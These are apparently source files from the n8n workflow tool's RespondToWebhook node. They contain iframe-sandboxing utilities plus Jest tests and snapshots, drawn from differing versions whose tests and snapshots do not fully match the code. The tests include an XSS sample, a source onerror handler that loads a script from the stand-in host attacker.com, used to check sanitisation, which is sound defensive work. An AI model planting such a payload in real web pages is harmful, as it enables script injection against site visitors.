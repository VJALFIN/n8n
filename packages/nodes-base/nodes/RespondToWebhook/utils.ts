import type { IBinaryData, IDataObject, IN8nHttpResponse } from 'n8n-workflow';
import { BINARY_ENCODING } from 'n8n-workflow';
import type { Readable } from 'node:stream';

export const configuredOutputs = (
	version: number,
	parameters: { enableResponseOutput?: boolean },
) => {
	const multipleOutputs = version === 1.3 || (version >= 1.4 && parameters.enableResponseOutput);
	if (multipleOutputs) {
		return [
			{
				type: 'main',
				displayName: 'Input Data',
			},
			{
				type: 'main',
				displayName: 'Response',
			},
		];
	}

	return ['main'];
};

/*
 * To prevent XSS and CSRF, we sanitize the response body by wrapping it in an iframe.
 * This prevents the API from being accessed since the iframe origin will be empty.
 */
export const sanitizeResponseData = (responseBody: string) => {
	return `
		<iframe srcdoc='${responseBody}'
			style="position:fixed; top:0; left:0; width:100vw; height:100vh; border:none; overflow:auto;"
			allowtransparency="true">
		</iframe>`;
};

export const getBinaryResponse = (binaryData: IBinaryData, headers: IDataObject) => {
	let responseBody: IN8nHttpResponse | Readable;

	if (binaryData.id) {
		responseBody =
			binaryData.mimeType === 'text/html' ? sanitizeResponseData(binaryData.data) : { binaryData };
	} else {
		const responseBuffer = Buffer.from(binaryData.data, BINARY_ENCODING);

		responseBody =
			binaryData.mimeType === 'text/html'
				? sanitizeResponseData(responseBuffer.toString())
				: responseBuffer;

		headers['content-length'] = (responseBody as Buffer).length;
	}

	headers['content-type'] ??= binaryData.mimeType;

	return responseBody;
};
