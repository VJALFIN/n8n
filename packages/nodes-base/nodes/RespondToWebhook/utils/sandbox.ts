export const replaceSingleQuotes = (responseBody: string) => {
	return responseBody.replace(/'/g, '&#39;');
};

/*
 * To prevent XSS and CSRF, we sanitize the response body by wrapping it in an iframe.
 * This prevents the API from being accessed since the iframe origin will be empty.
 */
export const sandboxResponseData = (responseBody: string) => {
	const parsedResponseBody = replaceSingleQuotes(responseBody);

	return `
		<iframe srcdoc='${parsedResponseBody}'
			style="position:fixed; top:0; left:0; width:100vw; height:100vh; border:none; overflow:auto;"
			allowtransparency="true">
		</iframe>`;
};
