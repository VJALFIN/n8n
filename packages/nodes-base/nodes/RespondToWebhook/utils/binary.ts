import type { IBinaryData, IDataObject, IN8nHttpResponse } from 'n8n-workflow';
import { BINARY_ENCODING } from 'n8n-workflow';
import type { Readable } from 'stream';

import { sandboxResponseData } from './sandbox';

const setContentLength = (responseBody: IN8nHttpResponse | Readable, headers: IDataObject) => {
	if (Buffer.isBuffer(responseBody)) {
		headers['content-length'] = responseBody.length;
	} else if (typeof responseBody === 'string') {
		headers['content-length'] = Buffer.byteLength(responseBody, 'utf8');
	}
};

export const getBinaryResponse = (binaryData: IBinaryData, headers: IDataObject) => {
	const mimeTypesToSanitize = ['text/html', 'application/xhtml+xml'];

	const contentType = headers['content-type'] as string;
	const shouldSandboxContentType = contentType ? mimeTypesToSanitize.includes(contentType) : false;

	let responseBody: IN8nHttpResponse | Readable;

	if (binaryData.id) {
		responseBody =
			mimeTypesToSanitize.includes(binaryData.mimeType) || shouldSandboxContentType
				? sandboxResponseData(binaryData.data)
				: { binaryData };
	} else {
		const responseBuffer = Buffer.from(binaryData.data, BINARY_ENCODING);

		responseBody =
			mimeTypesToSanitize.includes(binaryData.mimeType) || shouldSandboxContentType
				? sandboxResponseData(responseBuffer.toString())
				: responseBuffer;

		setContentLength(responseBody, headers);
	}

	headers['content-type'] ??= binaryData.mimeType;

	return responseBody;
};
