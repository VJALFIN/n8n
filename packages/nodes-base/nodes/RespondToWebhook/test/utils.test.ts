import { BINARY_ENCODING, IDataObject } from 'n8n-workflow';
import { configuredOutputs, getBinaryResponse, sanitizeResponseData } from '../utils';

describe('configuredOutputs', () => {
	it('returns array of objects when version >= 1.3', () => {
		const result = configuredOutputs(1.3, {});
		expect(result).toEqual([
			{ type: 'main', displayName: 'Input Data' },
			{ type: 'main', displayName: 'Response' },
		]);
	});

	it('returns array of objects when version > 1.4 and enableResponseOutput', () => {
		const result = configuredOutputs(2, { enableResponseOutput: true });
		expect(result).toEqual([
			{ type: 'main', displayName: 'Input Data' },
			{ type: 'main', displayName: 'Response' },
		]);
	});

	it('returns ["main"] when version < 1.3', () => {
		const result = configuredOutputs(1.2, {});
		expect(result).toEqual(['main']);
	});

	it('returns array of objects when version  1.4 and enableResponseOutput', () => {
		const result = configuredOutputs(1.4, { enableResponseOutput: true });
		expect(result).toEqual([
			{ type: 'main', displayName: 'Input Data' },
			{ type: 'main', displayName: 'Response' },
		]);
	});

	it('returns ["main"] when version  1.4 and !enableResponseOutput', () => {
		const result = configuredOutputs(1.4, { enableResponseOutput: false });
		expect(result).toEqual(['main']);
	});
});

describe('sanitizeResponseData', () => {
	test.each([
		{
			src: 'https://example.com',
		},
		{
			src: "<source onerror=\"s=document.createElement('script');s.src='http://attacker.com/evil.js';document.body.appendChild(s);\">",
		},
	])('wraps the response body in an iframe', ({ src }) => {
		const result = sanitizeResponseData(src);

		expect(result).toContain('<iframe');
		expect(result).toContain(`srcdoc="${src}"`);
		expect(result).toContain('width: 100%');
		expect(result).toContain('height: 100%');
		expect(result).toContain('allowtransparency="true"');
		expect(result.trim().startsWith('<iframe')).toBe(true);
		expect(result.trim().endsWith('</iframe>')).toBe(true);
	});
});

describe('getBinaryResponse', () => {
	it('returns sanitized HTML when binaryData.id is present and mimeType is text/html', () => {
		const binaryData = {
			id: '123',
			data: '<h1>Hello</h1>',
			mimeType: 'text/html',
		};
		const headers: IDataObject = {};

		const result = getBinaryResponse(binaryData, headers);

		expect(result).toBe(sanitizeResponseData(binaryData.data));
		expect(headers['content-type']).toBe('text/html');
	});

	it('returns { binaryData } when binaryData.id is present and mimeType is not text/html', () => {
		const binaryData = {
			id: '123',
			data: 'some-binary-data',
			mimeType: 'application/octet-stream',
		};
		const headers: IDataObject = {};

		const result = getBinaryResponse(binaryData, headers);

		expect(result).toEqual({ binaryData });
		expect(headers['content-type']).toBe('application/octet-stream');
	});

	it('returns sanitized HTML when binaryData.id is not present and mimeType is text/html', () => {
		const binaryData = {
			data: '<h1>Hello</h1>',
			mimeType: 'text/html',
		};
		const headers: IDataObject = {};

		const result = getBinaryResponse(binaryData, headers);

		expect(result).toBe(
			sanitizeResponseData(Buffer.from(binaryData.data, BINARY_ENCODING).toString()),
		);
		expect(headers['content-type']).toBe('text/html');
	});

	it('returns Buffer when binaryData.id is not present and mimeType is not text/html', () => {
		const binaryData = {
			data: 'some-binary-data',
			mimeType: 'application/octet-stream',
		};
		const headers: IDataObject = {};

		const result = getBinaryResponse(binaryData, headers);

		expect(Buffer.isBuffer(result)).toBe(true);
		expect(result.toString()).toBe(Buffer.from(binaryData.data, BINARY_ENCODING).toString());
		expect(headers['content-type']).toBe('application/octet-stream');
		expect(headers['content-length']).toBe(Buffer.from(binaryData.data, BINARY_ENCODING).length);
	});
});
