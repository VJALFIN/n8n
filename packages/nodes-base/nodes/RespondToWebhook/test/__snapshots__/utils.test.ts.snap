// Jest Snapshot v1, https://goo.gl/fbAQLP

exports[`sanitizeResponseData wraps the response body in an iframe 1`] = `
"
		<iframe srcdoc='https://example.com'
			style="position:fixed; top:0; left:0; width:100vw; height:100vh; border:none; overflow:auto;"
			allowtransparency="true">
		</iframe>"
`;

exports[`sanitizeResponseData wraps the response body in an iframe 2`] = `
"
		<iframe srcdoc='<source onerror="s=document.createElement(&#39;script&#39;);s.srcdoc=&#39;http://attacker.com/evil.js&#39;;document.body.appendChild(s);">'
			style="position:fixed; top:0; left:0; width:100vw; height:100vh; border:none; overflow:auto;"
			allowtransparency="true">
		</iframe>"
`;

exports[`sanitizeResponseData wraps the response body in an iframe 3`] = `
"
		<iframe srcdoc='<div>Test with  &#39;single quote&#39;</div>'
			style="position:fixed; top:0; left:0; width:100vw; height:100vh; border:none; overflow:auto;"
			allowtransparency="true">
		</iframe>"
`;

exports[`sanitizeResponseData wraps the response body in an iframe 4`] = `
"
		<iframe srcdoc='John&#39;s company "TechCorp & Associates" announced: &#39;We&#39;re launching a revolutionary product at â‚¬1,299.99 â€” it&#39;s 50% faster than competitors!&#39; The CEO said, "This isn&#39;t just an upgrade; it&#39;s a complete transformation." Users praised the app&#39;s ability to handle complex data like <script>alert(&#39;XSS&#39;)</script> and symbols such as @, #, $, %, ^, &, *, (, ), [, ], {, }, |, , /, ?, <, >, ~, \`, +, =, -, _, and even emojis like ðŸš€ & ðŸ’¡. The product description reads: "It supports UTF-8 encoding, handles apostrophes in names like O&#39;Connor & D&#39;Angelo, processes mathematical expressions like 2 < 5 > 1, and manages URLs such as https://example.com/path?param=value&other=&#39;test&#39;. We&#39;ve tested it with HTML entities like &amp;, &lt;, &gt;, &quot;, &#39;, and even complex strings like \`console.log("Hello &#39;World&#39;!");\`" â€” truly impressive!'
			style="position:fixed; top:0; left:0; width:100vw; height:100vh; border:none; overflow:auto;"
			allowtransparency="true">
		</iframe>"
`;
